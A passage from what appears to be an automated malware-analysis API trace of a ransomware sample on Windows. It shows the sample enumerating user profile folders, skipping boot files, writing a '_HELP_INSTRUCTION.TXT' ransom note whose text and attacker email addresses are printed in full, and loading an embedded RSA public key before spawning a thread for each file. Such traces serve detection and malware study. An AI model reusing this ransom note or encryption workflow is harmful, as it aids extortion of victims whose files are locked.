FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0133.982] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0133.982] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0133.982] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0133.982] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0133.982] lstrcatW (in: lpString1="C:\\Users\\", lpString2="All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0133.982] SetErrorMode (uMode=0x1) returned 0x1 [0133.982] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0133.982] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\" [0133.982] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\All Users\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\" [0133.982] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\*.*") returned="C:\\Users\\All Users\\*.*" [0133.982] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3a5550 [0133.982] PathFindFileNameW (pszPath="C:\\Users\\All Users") returned="All Users" [0133.983] lstrcpyW (in: lpString1=0x17d784, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0133.983] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 1 [0133.983] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users" [0133.983] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\*.*") returned="C:\\Users\\All Users\\*.*" [0133.983] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="Desktop") returned 0x0 [0133.983] StrStrW (lpFirst="C:\\Users\\All Users\\", lpSrch="DESKTOP") returned 0x0 [0133.983] SetErrorMode (uMode=0x1) returned 0x1 [0133.983] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\All Users\\_HELP_INSTRUCTION.TXT") returned 40 [0133.983] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0133.983] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0133.983] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x70c) returned 0x0 [0133.983] RegQueryValueExW (in: hKey=0x70c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ceb350, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x3ceb350*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0133.983] RegCloseKey (hKey=0x70c) returned 0x0 [0133.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0133.983] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0133.983] CreateFileW (lpFileName="C:\\Users\\All Users\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\all users\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x70c [0133.983] CloseHandle (hObject=0x70c) returned 1 [0133.984] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3a5550 [0133.984] PathFindFileNameW (pszPath="C:\\Users\\All Users") returned="All Users" [0133.984] lstrcpyW (in: lpString1=0x17d784, lpString2="All Users" | out: lpString1="All Users") returned="All Users" [0133.984] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0133.984] lstrcmpW (lpString1="Default", lpString2="..") returned 1 [0133.984] lstrcmpW (lpString1="Default", lpString2=".") returned 1 [0133.984] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0133.984] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0133.984] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0133.984] SetErrorMode (uMode=0x1) returned 0x1 [0133.984] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0133.984] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0133.984] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0133.984] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\*.*") returned="C:\\Users\\Default\\*.*" [0133.984] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3a5550 [0133.984] PathFindFileNameW (pszPath="C:\\Users\\Default") returned="Default" [0133.984] lstrcpyW (in: lpString1=0x17d784, lpString2="Default" | out: lpString1="Default") returned="Default" [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.984] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0133.984] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0133.984] StrStrW (lpFirst="NTUSER.DAT", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0133.984] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntldr") returned 0x0 [0133.984] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTLDR") returned 0x0 [0133.985] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTDETECT.COM") returned 0x0 [0133.985] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntdetect.com") returned 0x0 [0133.985] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0133.985] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0133.985] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0133.985] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.985] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0133.985] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0133.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x710 [0133.985] Sleep (dwMilliseconds=0x96) [0134.134] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0134.134] lstrcmpW (lpString1="NTUSER.DAT.LOG", lpString2="..") returned 1 [0134.134] lstrcmpW (lpString1="NTUSER.DAT.LOG", lpString2=".") returned 1 [0134.134] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0134.134] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="ntldr") returned 0x0 [0134.134] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="NTLDR") returned 0x0 [0134.134] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="NTDETECT.COM") returned 0x0 [0134.134] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="ntdetect.com") returned 0x0 [0134.134] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0134.134] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0134.134] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0134.135] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.135] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0134.135] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x704 [0134.135] Sleep (dwMilliseconds=0x96) [0134.290] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0134.290] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2="..") returned 1 [0134.290] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2=".") returned 1 [0134.290] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0134.290] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="ntldr") returned 0x0 [0134.290] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="NTLDR") returned 0x0 [0134.290] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="NTDETECT.COM") returned 0x0 [0134.290] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="ntdetect.com") returned 0x0 [0134.290] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0134.291] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0134.291] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0134.291] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.291] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0134.291] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.291] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f4 [0134.291] Sleep (dwMilliseconds=0x96) [0134.449] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0134.449] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2="..") returned 1 [0134.449] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2=".") returned 1 [0134.449] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0134.449] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="ntldr") returned 0x0 [0134.449] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="NTLDR") returned 0x0 [0134.450] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="NTDETECT.COM") returned 0x0 [0134.450] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="ntdetect.com") returned 0x0 [0134.450] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0134.450] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0134.450] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0134.450] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.450] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0134.450] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.450] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f8 [0134.450] Sleep (dwMilliseconds=0x96) [0134.602] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0134.602] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0134.602] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0134.602] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0134.602] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntldr") returned 0x0 [0134.602] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTLDR") returned 0x0 [0134.602] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTDETECT.COM") returned 0x0 [0134.602] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntdetect.com") returned 0x0 [0134.602] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0134.602] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0134.602] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0134.602] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.602] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0134.602] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.602] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0134.603] Sleep (dwMilliseconds=0x96) [0134.758] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0134.758] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0134.758] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0134.758] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0134.758] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntldr") returned 0x0 [0134.759] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0134.759] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0134.759] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0134.759] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0134.759] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0134.759] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0134.759] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") 